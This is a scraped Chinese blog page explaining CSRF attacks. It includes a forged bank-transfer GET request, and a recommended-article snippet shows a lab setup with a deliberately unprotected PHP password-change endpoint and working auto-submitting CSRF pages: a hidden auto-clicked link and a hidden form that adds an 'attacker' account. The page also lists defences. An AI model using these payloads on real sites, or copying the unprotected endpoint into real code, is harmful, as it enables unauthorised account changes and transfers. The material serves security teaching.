跨站请求伪造(CSRF)攻击

最新推荐文章于 2025-05-09 12:00:22 发布
原创 最新推荐文章于 2025-05-09 12:00:22 发布 · 622 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #前端 #xsrf #攻击

什么是CSRF

跨站请求伪造(Cross-Site Request Forgery,CSRF),也称为XSRF、Sea SurfSession Riding,是一种攻击向量,通过欺骗Web浏览器在用户已登录的应用程序中执行不需要的操作。

成功的CSRF攻击对企业和用户都可能造成巨大破坏。它可能导致客户关系受损、未经授权的资金转移、密码更改和数据窃取,包括被盗的会话cookie

CSRF通常通过恶意社会工程手段进行,比如通过电子邮件或链接欺骗受害者向服务器发送伪造请求。由于在攻击时用户已经通过其应用程
序进行了身份验证,因此无法区分合法请求和伪造请求。
在这里插入图片描述

CSRF案例

在执行攻击之前,攻击者通常会研究一个应用程序,以使伪造的请求看起来尽可能合法。

例如,一个典型的用于转账100美元的GET请求可能如下所示:

GET http://netbank.com/transfer.do?acct=PersonB&amount=$100 HTTP/1.1

黑客可以修改这个脚本,使之导致100美元转账到他们自己的账户。现在,恶意请求可能如下所示:

GET http://netbank.com/transfer.do?acct=AttackerA&amount=$100 HTTP/1.1

最低0.47元/天 解锁文章
DVWA-CSRF(跨站请求伪造)
qq_45751902的博客
04-25 3166
目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(跨站请求伪造)简介 概念 CSRFCrosssite request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
CSRF(Cross-site request forgery)
fencecat的博客
07-20 1069
CSRF是一个web安全漏洞,该漏洞通过引诱用户来执行非预期的操作。该漏洞使得攻击者能够绕过同源策略,同源策略是一种用来阻止不同网站相互干扰的一种技术。 CSR跨站请求伪造攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。在CSRF攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行点击,用户一旦点击,整个攻击也就完成了。所以CSRF攻击也被称为”one click"攻击
(保姆级教学)跨站请求伪造漏洞
m0_63436163的博客
04-19 3073
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
CSRF(Cross-Site Request Forgery) 跨站请求伪造
Eason_LYC安全白帽子的成长博客
05-13 1937
WEB安全中CSRF漏洞攻击最为全面的知识点总结,直击核心知识点,将零散的知识汇总梳理。为深入学习CSRF打下良好基础!
DVWA学习之CSRF(跨站请求伪造)
weixin_40950781的博客
08-18 2060
DVWA学习之CSRFCSRF(Cross-site request forgery,跨站请求伪造)0x01 何为CSRF?0x02 CSRF原理0x03 low级别0x04 medium级别0x05 high级别0x06 impossible级别0x07 CSRF防御服务端的防御验证HTTP Referer字段在请求地址中添加token并验证在HTTP头中自定义属性并验证用户端的防御安全设备的防...
DVWA跨站请求伪造CSRF攻击全面分析
abraham76的博客
10-01 3600
1、CSRF简介    CSRF全称是Cross Site Request Forgery跨站请求伪造。简单理解就是利用客户身份伪造请求,以达到指定目的。    具体场景就是:假设A登陆了某游戏网站Game,那么Game网站就会返回一个cookie来记录用户身份,以后每次请求都会自动携带该cookie与Game服务器交互。然后攻击者B精心构造了一个链接或者网页,诱使用户点击,这时就会向Game服务器发送一个请求,而该请求是携带了cookie值的,服务器就会处理该请求。B的目的就达到了。    CSRF攻击
Tomcat怎样防止跨站请求伪造(CSRF) 1
08-08
Tomcat 防止跨站请求伪造CSRF)机制浅析 在 Web 应用开发中,跨站请求伪造CSRF)是一种常见的安全威胁。跨站请求伪造攻击是指攻击者诱骗受信任用户访问恶意网站,从而使得恶意网站能以用户身份对受信任网站执行...
跨站请求伪造CSRF攻击:原理、案例分析与防御策略
m0_61532714的博客
06-12 3177
多层次的综合防御策略,包括使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie,是防范CSRF攻击的关键。CSRF攻击的核心在于利用用户已经登录的身份,向目标网站发送恶意请求攻击者通过构造恶意的GET请求,诱使用户点击链接或访问恶意网站,从而在用户不知情的情况下执行恶意操作。攻击者通过构造恶意的表单提交,诱使用户点击按钮或自动提交表单,从而在用户不知情的情况下执行恶意操作。在每个敏感操作的表单或请求中包含一个的CSRF令牌,服务器在接收到请求时验证该令牌,请求的合法性。
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 2403
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站点上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解。
借助pikachu和DVWA靶场带你走进跨站请求伪造CSRF攻击
最新发布
2301_77091612的博客
05-09 951
CSRFCross-Site Request Forgery跨站请求伪造)是一种利用用户在已认证网站上的身份,本质上是利用网站的同源策略对该网站执行非本意操作的攻击方式。下面是其和。
跨站请求伪造CSRF攻击与防御原理
weixin_58954236的博客
09-01 1791
跨站请求伪造Cross Site Request ForgeryCSRF)是一种攻击,它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击攻击的重点在于更改状态的请求,而不是盗取数据,因为攻击者无法查看伪造请求的响应。借助于社工的一些帮助,例如,通过电子邮件或聊天发送链接,攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户,则成功的CSRF 攻击可以强制用户执行更改状态的请求,例如转移资金、修改密码等操作。
DVWA —— Cross Site Request Forgery (CSRF) 跨站请求伪造
YouTheFreedom的博客
05-22 942
跨站请求伪造(英语:Cross-siterequest forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF ,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。因为是模仿受害者点击该连接实现密码修改,所以需要点击该链接提交表单时也需要受害者在网站上处于登陆状态,而且登陆后浏览器中保存了验证身份的 cookie 等信息,所以登陆网站的浏览器也要与之前相同,否则身份验证不成功,就无法成功修改用户密码了。
跨站请求伪造CSRFCross-Site Request Forgery
坚定目标,超越自我
10-10 3487
由于跨站请求通常无法携带自定义头信息,因此检查请求中是否包含自定义头可以作为一种防御手段。使用自定义请求头是一种防御跨站请求伪造CSRF攻击的技术。这种方法的基本思想是在客户端的请求中添加一个自定义的HTTP头部(Header),服务器端检查这个头部以验证请求的合法性。由于跨站请求通常无法设置自定义头部,这为服务器提供了一种简单的验证机制。
Django中的CSRF
weixin_30670965的博客
03-31 234
CSRFCross Site Request Forgery, 跨站请求伪造CSRF 背景与介绍 CSRFCross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一。其他安全隐患,比如 SQL 脚本注入,跨站域脚本攻击等在近年来已经逐渐为众人熟知,很多网站也都针对他们进行了防御。然而,对于...
跨站请求伪造CSRF攻击原理及预防手段
慢慢
06-02 6442
随机化Token(CSRF Token):Token是用于验证网站请求者身份的一种机制,可以防止CSRF攻击。该Token会在每次访问页面时刷新,以确保每次请求都需要新的Token。例如,在web应用程序中,可以通过hidden field的方式将Token加入到表单中,提交时验Referer检查:在服务端校验请求头中的Referer字段,确保请求是来自合法的来源页面,常用于辅助Token机制的验证。
科普文:软件架构设计之【网络安全:跨站请求伪造CSRFCross-site request forgery)原理和防御】
为无为,事无事,味无味。
08-16 1079
跨站请求伪造Cross-site request forgery),CSRF是指利用受害者尚未失效的身份认证信息(登录状态中的Cookie等),诱骗受害者点击恶意链接,或者访问包含攻击代码的页面,在受害者不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作。可以这样说,攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成攻击者所期望的一个操作。
跨站请求伪造Cross-Site Request Forgery, CSRF)的检测和防御通
qq_31532979的贺公子之数据科学与艺术博客,致力于科技向善,拥抱开源,要用技术的影响力来领导团队,而不是威权和职位!
12-22 565
在API调用中,可以将JWT作为认证令牌发送给API端,并在API端对JWT进行验证,以确保请求的合法性和完整性。可以在请求头或请求体中包含一个CSRF令牌,API接收到请求后会验证该令牌的有效性。API密钥验证:可以为每个API调用生成一个唯一的API密钥,并在请求中包含该密钥。API端接收到请求后,会验证该密钥的有效性,以确保请求来自授权的应用程序。:如果涉及到API调用,可以在API端也添加CSRF验证,如在JWT(JSON Web Tokens)中包含一个nonce(一次性请求标记)。
【亲测免费】 CSRF跨站请求伪造测试工具及步骤
gitblog_06577的博客
09-20 1195
CSRF跨站请求伪造测试工具及步骤 去发现同类优质开源项目:https://gitcode.com/ 简介 本仓库提供了一个用于测试CSRF跨站请求伪造)漏洞的工具以及详细的测试步骤。CSRF是一种常见的网络安全漏洞,攻击者可以通过伪造用户的请求来执行未经授权的操作。通过使用本仓库提供的工具,您可以有效地检测和验证网站是否存在CSRF漏洞。 工具介绍 CSRFTester: 这是一个专门用...
CSRFCross-Site Request Forgery跨站请求伪造
qq_69100706的博客
04-18 694
CSRFCross-Site Request Forgery跨站请求伪造)是一种常见的网络攻击手段,它允许攻击者在用户毫不知情的情况下,以用户的名义伪造并提交操作请求到目标网站。这种攻击主要利用了Web应用程序的用户身份验证凭证(如Cookie、Session Token等)在用户浏览器内自动包含的特点,迫使已登录用户在当前已信任的网站上执行攻击者预设的操作。目标网站接收到请求后,因为携带了有效的认证信息,误以为是用户A的正常操作,于是执行了攻击者预设的请求动作,比如转账、删除数据、修改设置等。
跨站请求伪造CSRF实验
04-03
### 关于跨站请求伪造CSRF)实验的设计与实施 #### 实验目标 通过设计并执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动点击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标站点提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,并掌握相应的缓解手段。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

诗雅颂

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值